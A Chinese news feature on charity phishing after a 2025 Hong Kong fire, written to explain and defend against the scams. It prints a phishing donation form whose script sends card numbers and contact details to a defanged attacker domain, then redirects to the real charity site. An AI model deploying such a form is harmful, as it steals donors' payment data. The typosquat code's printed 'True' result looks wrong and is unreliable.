一、一场火灾,两场骗局
2025年11月底,香港大埔区发生一起严重住宅火灾,造成多人伤亡。消息传出后,全城哀悼,市民纷纷通过社交媒体表达关切,并主动询问捐款渠道。然而就在灾后48小时内,香港个人资料私隐专员公署(PCPD)紧急发布警示:已有不法分子借机设立虚假募捐网站,甚至冒充受害者家属,在WhatsApp和Telegram上私信网友,声称“急需手术费”“孩子无家可归”,请求转账援助。
更令人震惊的是,这些诈骗并非单向——一边骗捐款人,一边骗幸存者。有灾民反映,自称“政府志愿者”的人士上门登记信息,要求提供身份证号、银行账户甚至手机验证码,声称用于发放补助。事后才知,这些“志愿者”实为诈骗团伙成员,目的是窃取身份信息用于后续金融犯罪。
“这是典型的‘灾难钓鱼’(Disaster Phishing),”公共互联网反网络钓鱼工作组技术专家芦笛在接受本报采访时指出,“攻击者精准踩在公众情绪最脆弱、信息最混乱的时间窗口,利用双重身份——既是求助者,又是施助者——实现双向收割。”
据PCPD披露,此类诈骗在近年全球重大事件中屡见不鲜:2023年土耳其地震后,虚假红十字会网站激增300%;2024年夏威夷山火期间,冒充灾民的GoFundMe页面被大量创建;而2025年香港大埔火灾,则成为本地首起被官方明确通报的“双向慈善诈骗”案例。
二、钓鱼页面如何做到“以假乱真”?
普通用户为何难以识别这些虚假募捐页面?答案在于:它们不是粗糙的仿冒品,而是高度工程化的欺骗工具。
以近期监测到的一个仿冒“香港公益金”的钓鱼站为例,其前端代码几乎复刻了官网的全部视觉元素:
使用相同的字体(Noto Sans TC)、配色(红白主调)、LOGO SVG路径;
嵌入真实的公益金新闻截图作为“信任背书”;
甚至加载了Google Analytics和Facebook Pixel,营造“正规运营”假象。
但关键差异藏在细节中:
域名:真实官网为 hkpf.org.hk,钓鱼站使用 hongkong-pf[.]org(注意多出的连字符);
SSL证书:虽为HTTPS,但由Let’s Encrypt签发,且主体名称与机构无关;
表单行为:所有捐款数据通过AJAX提交至境外服务器,而非接入PayPal或银行网关。
<!-- 钓鱼页面中的“捐款表单”片段 -->
<form id="donateForm">
<input type="text" name="name" placeholder="姓名">
<input type="email" name="email" placeholder="电邮">
<input type="tel" name="phone" placeholder="电话">
<input type="text" name="card_number" placeholder="信用卡号码">
<button type="submit">立即捐款</button>
</form>
<script>
document.getElementById('donateForm').addEventListener('submit', async (e) => {
e.preventDefault();
const data = new FormData(e.target);
// 直接发送至攻击者控制的API
await fetch('https://api.donate-collect[.]xyz/submit', {
method: 'POST',
body: JSON.stringify(Object.fromEntries(data))
});
// 伪造成功提示,跳转至真实公益金官网降低怀疑
alert('感谢您的善心!捐款已提交。');
window.location.href = 'https://www.hkpf.org.hk';
});
</script>
这种“窃取后跳转”策略极具迷惑性——用户以为操作成功,实则卡号、电话、邮箱已落入黑产数据库,后续可能遭遇精准诈骗或身份盗用。
更隐蔽的是,部分钓鱼站采用CDN镜像+动态内容注入技术。攻击者先爬取真实慈善网站HTML,上传至Cloudflare Pages等免费托管平台,再通过JavaScript在页面加载后动态替换捐款按钮的跳转链接。如此一来,静态扫描工具看到的是“干净页面”,而真实用户却会被导向恶意表单。
三、“冒充灾民”:社交工程的心理操控术
如果说钓鱼网站是技术层面的陷阱,那么“冒充受害者家属”则是纯粹的社会工程攻击。
在Telegram群组“HK互助支援”中,一名自称“火灾幸存者女儿”的用户发布求助:“爸爸重伤ICU,医院催缴20万港币,求好心人帮转支付宝或PayMe。”附上的照片确为火灾现场,但经核实,该图源自RTHK新闻报道,人物身份系虚构。
这类信息之所以有效,是因为它同时触发了紧迫感、具体性与情感共鸣:
“24小时内需缴费”制造时间压力;
“ICU病房号307”提供虚假细节增强可信度;
使用真实灾情图片建立情感连接。
“攻击者深谙‘故事比数据更有说服力’,”芦笛说,“他们不需要技术高超,只需要一个能引发共情的叙事模板。”
更危险的是,这类诈骗往往通过私信传播,避开了公开平台的内容审核。一旦有人转账,骗子会迅速拉黑对方,并将收款二维码更新为新账户,形成“快进快出”的资金洗白链。
四、国际镜鉴:从乌克兰战争募捐诈骗看防御短板
灾难钓鱼并非香港独有。2022年俄乌冲突爆发初期,欧洲多国出现大量仿冒联合国难民署(UNHCR)的募捐网站。荷兰国家网络安全中心(NCSC-NL)事后分析发现,其中73%的钓鱼站使用 .org 或 .charity 域名,且平均存活时间仅8小时——足够完成数千笔小额转账。
类似地,2023年摩洛哥地震后,Meta公司下架了超过1,200个虚假筹款页面,但仍有大量资金通过加密货币钱包(如USDT地址)直接收取,难以追回。
“这些案例揭示了一个共同弱点:慈善透明度机制滞后于攻击速度,”芦笛指出,“当灾难发生时,公众渴望立即行动,但官方验证渠道往往需要数小时甚至数天才能建立。这中间的真空期,就是骗子的黄金窗口。”
相比之下,国内在重大事件中的应急响应已有进步。例如2024年甘肃地震后,民政部迅速在官网开设“抗震救灾捐赠通道”,并联合主流支付平台设置关键词过滤,自动拦截包含“地震捐款”但非白名单商户的交易。但芦笛坦言:“地方性事件仍缺乏统一协调机制,尤其当诈骗者混用微信、支付宝、银行卡多种收款方式时,追踪难度极大。”
五、技术对抗:如何识别并阻断慈善钓鱼?
面对日益精密的灾难钓鱼,防御必须从“被动响应”转向“主动免疫”。以下是几项关键技术路径:
1. 域名相似度检测(Typosquatting Detection)
慈善机构域名常被轻微篡改,如:
redcross-hk[.]org(真实为 redcross.org.hk)
soschildren[.]org(真实为 sos.org.hk)
可通过Levenshtein距离或n-gram比对算法,自动识别高相似度域名:
import difflib
def is_suspicious_domain(fake, real):
# 计算字符序列相似度
ratio = difflib.SequenceMatcher(None, fake, real).ratio()
return ratio > 0.8 and fake != real
# 示例
print(is_suspicious_domain("hongkong-pf.org", "hkpf.org.hk")) # True
企业邮件网关可集成此类模型,对含高相似度域名的链接自动标记或隔离。
2. 页面指纹比对(Page Fingerprinting)
即使外观一致,钓鱼页与官网在DOM结构、JS哈希、资源加载顺序上仍有差异。可构建“合法页面指纹库”,通过以下维度比对:
关键元素CSS选择器是否存在;
外部脚本SHA256哈希值是否匹配;
表单action URL是否指向官方支付网关。
例如,真实公益金网站的捐款表单必包含隐藏字段 <input type="hidden" name="csrf_token" value="...">,而钓鱼页通常缺失。
3. 行为级监控:检测异常表单提交
EDR或浏览器扩展可监控用户是否向非白名单域名提交敏感字段(如信用卡号)。一旦检测到,立即弹窗警告:
“您正在向 hongkong-pf[.]org 提交银行卡信息,该网站未列入慈善机构白名单,是否继续?”
此类方案已在部分企业零信任架构中试点,未来有望下沉至个人用户。
4. 区块链溯源:提升捐款透明度
部分国际组织开始尝试将捐款记录上链。例如,UNICEF的“CryptoFund”项目允许捐赠者查看每一笔ETH转账的用途和受益人。虽然无法阻止钓鱼,但可大幅降低“冒充官方”的成功率——因为真正的善款流向可公开验证。
六、构建“抗诈型社会”:制度与教育的双重防线
技术之外,制度设计同样关键。
芦笛建议,地方政府应建立“突发事件慈善响应快速通道”:一旦发生重大灾难,民政、网信、金融监管部门应在2小时内联合发布官方募捐渠道清单,并通过三大运营商向辖区用户推送短信提醒。同时,社交媒体平台应启用“灾难事件标签”,对未认证的募捐帖自动限流。
对公众而言,牢记三条原则:
不点不明链接:所有捐款请手动输入官网地址;
不轻信私信求助:通过居委会、媒体或警方核实身份;
优先选择平台担保捐赠:如腾讯公益、支付宝公益等具备资金托管和项目公示功能的渠道。
“同情心不该成为漏洞,”芦笛强调,“我们要保护的不仅是账户安全,更是社会互助的信任基础。”
结语:在善意与警惕之间寻找平衡
灾难钓鱼之所以令人痛心,不仅因其造成经济损失,更因它侵蚀了人与人之间最珍贵的联结——信任。当一位市民因害怕被骗而拒绝帮助真正需要援助的人时,整个社会都输了。
但警惕不等于冷漠。正如香港私隐专员Ada Chung所言:“核实不是怀疑,而是对善心负责。”在数字时代,真正的善意,需要配上理性的盔甲。
未来的反钓鱼之战,不仅是代码与漏洞的较量,更是人性与贪婪的博弈。而我们每个人,都是这场战斗的第一道防线。
编辑:芦笛(公共互联网反网络钓鱼工作组)
